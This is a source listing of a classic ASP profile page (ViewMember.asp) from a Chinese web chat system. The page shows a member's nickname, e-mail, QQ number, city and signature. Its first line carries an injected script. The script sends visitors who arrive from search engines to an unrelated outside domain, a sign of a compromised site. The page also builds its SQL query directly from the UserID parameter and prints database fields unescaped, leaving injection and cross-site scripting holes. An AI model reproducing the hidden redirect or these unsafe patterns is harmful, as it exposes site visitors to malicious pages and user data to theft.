d:\wwwroot\wuchunhua\liaotianim\ViewMember.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/DAL.asp"-->
002: <!--#include file="inc/md5.asp"-->
003: <%
004: On Error Resume Next
005: if Session(Session_UserID_Arg)="" then RW "<script>location.href='../"&Web_Log_URL&"';</script>":response.end()
006: if request("UserID")="" then RW "<script>alert('参数错误!');window.close();</script>":response.end()
007: dim UserPic,UserPass,UserMail,UIRs
008: set UIRs=Server.CreateObject( "ADODB.Recordset" )
009: UIRs.OPEN "select * from [XK_User_Info] where [User_ID]="&request("UserID") , DB_CONN , 1 , 3
010: dim DefaultPic,Usex
011: if UIRs("User_Pic")<>"" then
012:     DefaultPic=UIRs("User_Pic")
013: else
014:     if Cstr(UIRs("User_sex"))="0" then DefaultPic="images/man.gif" else DefaultPic="images/woman.gif" end if
015: end if
016: if Cstr(UIRs("User_sex"))="0" then
017:     Usex="male"
018: else
019:     Usex="female"
020: end if
021: %
>
022:
023: <html>
024: <head>
025: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
026: <title>iCenter - <%=SysConfig("System_Name")%></title>
027: <meta name="keywords" content="ImChat V1.5 Power By XKnet.net">
028: <meta name="description" content="ImChat V1.5 Power By XKnet.net">
029: <link href="CSS_Custom/style.css" rel="stylesheet" type="text/css" />
030: <script language="javascript" src="JS_Custom/pcasunzip.js"></script>
031: <style>
032:    *{font-family:"微软雅黑";}
033:    .body{ background-image:url(images/RoomBg.jpg); background-repeat:no-repeat; background-position:center 100px;}
034:    .btn{background: url(SysTem_Manage/themes/blue/img/bg_buttons.png) repeat-x top; border: 1px solid #0D87AE!important; color: #fff; font-size: 11px; padding: 7px 10px; boirder-radius: 7px; -moz-border-radius: 7px; font-weight: 700; border: none;}
035:     .btn:hover {background: url(SysTem_Manage/themes/blue/img/bg_buttons.png) 0 -50px; border: 1px solid #005977; cursor: pointer;}
036:     .inputbox{height:26px;}
037:     .leftnav li{text-align:center;}
038:     .leftnav li a{margin-left:20px;margin-bottom:5px;text-align:center;display:block;height:64px;line-height:64px;}
039:     .leftnav li a:hover{background-position:bottom left;}
040:     .UserInfo{background: url(images/userinfo.png) no-repeat top left;}
041:     .UserRoom{background: url(images/UserRoom.png) no-repeat top left;}
042:     .UserFriend{background: url(images/UserFriend.png) no-repeat top left;}
043:     .title{background: url(images/titlebg.png) no-repeat 0px -20px;height:300px;text-align:center;width:35px;color:#333;padding-top:20px;letter-spacing:6px;*padding-top:0px !important;_padding-top:20px;padding-left:3px;_padding-left:0px;line-height:18px;color:#555;}
044:     .title span{background: url(images/dot.png) no-repeat;padding-top:20px;width:15px;}
045:     .title span label{color:#333;}
046:     .UserPhoto{width:100px;height:100px;margin-top:1px;margin-left:1px;}
047:     .photodiv{float:left;width:102px;*width:105px; height:102px;*height:104px;border:#ccc solid 1px;overflow:hidden;}
048:     .line{clear:both;line-height:5px;height:5px;}
049:     .text{background: none repeat scroll 0 0 transparent;border: 0 none;background-position: 0 -72px;border: 1px solid #C1C1C1;color:#444444;font-size: 14px;height: 30px;padding: 4px 5px 4px 0;width: 300px;padding-left:10px;}
050:     .itemtitle{float:left;height:28px;width:40px;line-height:28px;border:#ddd solid 1px;margin-right:3px;background: url(images/glassbg.png) bottom left no-repeat;text-align:center;color:#999}
051:     textarea{border: 1px solid #C1C1C1;background: none repeat scroll 0 0 transparent;width:300px;padding-left:10px;}
052:     select{height:30px;line-height:30px;border: 1px solid #C1C1C1;background: none repeat scroll 0 0 transparent;}
053:     .radio{}
054:     .btn-ok{background-image: url("images/global.png");background-color: transparent;background-position: 0 -288px;border: 0 none;cursor: pointer;height: 39px;margin: 10px 20px 10px 0;vertical-align: middle;width: 76px;margin-left:45px;}
055:     
056:     .png{}
057:     
058:     div{border:#ccc solid 0px;}
059: </style>
060: </head>
061: <body>
062: <table class="body" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
063:   <tr height="70px">
064:     <td style="text-align:center;"><div class="top">
065:    <div style="width:90%; margin:0 auto;"><a href="index.html" style="float:left;"><img src="images/logo.gif" border="0" /></a>
066:     <a href="inc/ValidLogin.asp?Out=true" title="退出" class="logout"></a>
067:     <a href="javascript:\\;" title="加入浏览器收藏夹" onClick="window.external.AddFavorite(location.href,document.title);" class="fav"></a>
068:     <a href="RoomList.asp" title="房间列表" class="RList"></a>
069:     <a href="Member.asp" title="用户中心" class="user"></a>
070:     <a href="Pay.asp" title="充值" class="pay"></a>
071:     </div>
072:     </div></td>
073:   </tr>
074:   <tr>
075:     <td valign="top">
076:         <div style="float:left;width:7%;text-algin:center;min-width:85px;_width:85px;_overflow:visible;">
077:             <ul class="leftnav">
078:                 <li><a href="member.asp" title="我的资料" class="png UserInfo"></a></li>
079:                 <li><a href="MyRoomList.asp" title="我的房间" class="png UserRoom"></a></li>
080:                 <li><a href="#" title="我的好友" class="png UserFriend"></a></li>
081:             </ul>
082:         </div>
083:         <div style="float:left;width:4%;text-align:center;">
084:             <div style="width:100%;margin:0 auto;">
085:                 <div class="title png" style="writing-mode: lr-tb;">
086:                     <span class="png"><label><%=UIRs("User_NickName")%></label></span>
087:                 </div>
088:             </div>
089:         </div>
090:         <div style="float:left;width:78%;text-align:center;">
091:             <div style="width:90%;margin:0 auto;text-align:left;padding-top:30px;">
092:                 <div style="float:left;width:105px;text-align:center;margin-right:5px;">
093:                     <div class="photodiv"><label for="man"><img id="UserPic" src="<%=DefaultPic%>" class="UserPhoto"></label><div class="png" style="position:relative;top:-20px;right:2px;background: url(images/icos/<%=Usex%>.png) bottom right no-repeat;height:16px;"></div></div><div class="line"></div>
094:                 </div>
095:                 <div class="line"></div>
096:                 <label class="itemtitle">角色</label><span id="UserListIcon" style="background:url(<%=GetPowerInfo(UIRs("User_Power"),"Power_Icon")%>) center center no-repeat;" title="<%=GetPowerInfo(UIRs("User_Power"),"Power_Name")%>"></span><div class="line"></div>
097:                 <label class="itemtitle">级别</label><span id="UserListIcon" style="background:url(<%=GetLevelInfo(ScoreLevel(UIRs("User_Score")),"Level_Icon")%>) center center no-repeat;" title="<%=GetLevelInfo(ScoreLevel(UIRs("User_Score")),"Level_Name")%>"></span><div class="line"></div>
098:                 <label class="itemtitle">头衔</label><%=GetTitles(UIRs("User_Title"))%><div class="line"></div>
099:                 <label class="itemtitle" for="UserMail">邮箱</label><input id="UserMail" type="text" name="UserMail" class="text"  readonly="readonly" value="<%=UIRs("User_Mail")%>"><div class="line"></div>
100:                 <label class="itemtitle" for="UserQQ">Q&nbsp;Q</label><input id="UserQQ" type="text" name="UserQQ" class="text" readonly="readonly" value="<%=UIRs("User_QQ")%>"><div class="line"></div>
101:                 <label class="itemtitle">城市</label><select readonly="readonly" name="User_Add_Province"></select>&nbsp;<select readonly="readonly" name="User_Add_City"></select><div class="line"></div>
102:                 <script>
103:                     <%
104:                     if UIRs("User_Add_Province")<>"" then
105:                     %
>
106:                     new PCAS("User_Add_Province","User_Add_City","<%=UIRs("User_Add_Province")%>","<%=UIRs("User_Add_City")%>");
107:                     <%
108:                     else
109:                     %
>
110:                     new PCAS("User_Add_Province","User_Add_City");
111:                     <%
112:                     end if
113:                     %
>
114:                 </script>
115:                 <label class="itemtitle" readonly="readonly" for="User_Note">签名</label><textarea id="User_Note" name="User_Note" cols="45" rows="5" maxlength="200"><%=UIRs("User_Note")%></textarea><div class="line"></div>
116:             </div>
117:         </div>
118:     </td>
119:   </tr>
120: </table>
121: <!--[if IE 6]>
122:     <script type='text/javascript' src='js_Custom/DD_belatedPNG_0.0.8a-min.js'></script>
123:     <script type='text/javascript'>
124:       DD_belatedPNG.fix('.png');
125:     </script>
126: <![endif]-->

127: <div style="visibility:hidden;display:none;">
128: <script type="text/javascript" src="js/ext-base.js"></script>
129: <script type="text/javascript" src="js/ext-all-debug.js"></script>
130: <img src="images/logo.gif">
131: <img src="images/dgbg.jpg">
132: <img src="css/ext-all.css">
133: <img src="css_custom/layout.css">
134: <div>
135: </body>
136: </html>
137:
138: